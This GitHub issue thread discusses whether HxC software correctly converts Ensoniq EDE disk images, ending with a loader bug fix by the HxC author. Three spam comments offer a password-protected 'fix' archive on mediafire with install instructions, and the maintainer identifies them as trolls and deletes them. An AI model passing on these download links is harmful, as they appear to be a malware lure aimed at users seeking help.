keirf/flashfloppy #925: Host Platforms doc error

chickeneps, 2024-08-27:
In the Ensoniq section, it says "The common EDE/EDA/EDS/EDT/EDV image formats are not directly supported by FlashFloppy. These can be converted to HFE or IMG format using HxC software."

This isn't correct. The "ED" formats were designed by Giebler Enterprises in the 90's and are not straight raw data image files. Even though HxC makes some mention of EDx files, it really doesn't truly convert them to IMG or HFE. They MAY work if the EDx files are not fragmented or have some (legal) directory issues.

If I'm wrong about HxC, pelase tell me how it converts EDx files to IMG.

What is correct, for sure, is Chicken System's Translator Free does convert EDx files to standard IMG files. www.chickensys.com/translatorfree

Avishake2017, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

chickeneps, 2024-08-27:
May I ask what this is?

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

chickeneps, 2024-08-27:
Are these trollers?

keirf, 2024-08-27:
> Are these trollers?

Yes. Deleted.

keirf, 2024-08-27:
Here is the code in HxC which appears to load EDE (and others, as it mentions various Ensoniq instruments, but it may only support EDE file extension): https://github.com/jfdelnero/HxCFloppyEmulator/blob/main/libhxcfe/sources/loaders/ede_loader/ede_loader.c

It doesn't look particularly sophisticated. It loads blocks based on a block-presence bitmap in the image header.

I couldn't find a feature list for Translator Free. :)

chickeneps, 2024-08-27:
Maybe I'm stupid, but I couldn't figure out in the life of me how to convert a EDE file to a IMG file. The HxC Utility is really unnecessarily complicated. But anyway.

Translator Free doesn't have a "feature list" per se, perhaps it should have one. It has a supported formats list, which is essentially the meat-and-potatoes of what the app offers. It does tons of other things, which would clutter up any feature list. It does have a Virtual Drive Convertor and that does all the images conversions.

keirf, 2024-08-27:
"Load" the EDE image. "Export" as IMG image.

Happy to mention Chicken Systems too!

chickeneps, 2024-08-27:
Whenever I click the Load button, and select a valid EDE file, I get Load File Error! Read File Error! Permissions are all R+W and Translator loads it just fine. Trying on a Mac, latest version (downloaded today).

keirf, 2024-08-27:
Is there an available EDE file with this problem? I'll take a look.

chickeneps, 2024-08-27:
Here you go
[Bagfed 029.zip](https://github.com/user-attachments/files/16769821/Bagfed.029.zip)

jfdelnero, 2024-08-28:
> Okay thanks, I can see that HxC expects to find a host identifier at byte 0x1FF in the image header. The above image has 00 in that byte which HxC chokes on. Clearly HxC's support is incomplete!
> 
> I'll add Chicken Systems to the wiki text before I close this ticket.

Someone points me this issue, since this appears to be related to the HxC software.

I have checked the "Bagfed 029.ede" file and the 0x00 code is definitely not documented. Anyway, I have tested this file against the original software (the Giebler Ensoniq Disk Extractor Shareware Version 1.0.9. / EDE109), it can read it, although it can't identify the target machine... So this seems to be a kind of fallback mode or something like this...

It would be interesting to know which software produced this file.

Anyway this was fixed in the hxc software this morning and you can download it there :

https://hxc2001.com/download/floppy_drive_emulator/HxCFloppyEmulator_soft_beta.zip

Both EDE109 and HxC software produce the same disk from this image.

If you any other issue with the HxC software, don't hesitate to make an issue there :
https://github.com/jfdelnero/HxCFloppyEmulator/issues

keirf, 2024-08-28:
Thanks for notifying of the fix and update, Jeff!

keirf, 2024-08-28:
A bug fixed in HxC software, and the FF wiki is improved. Job done on this ticket I think.

closed 2024-08-28 by keirf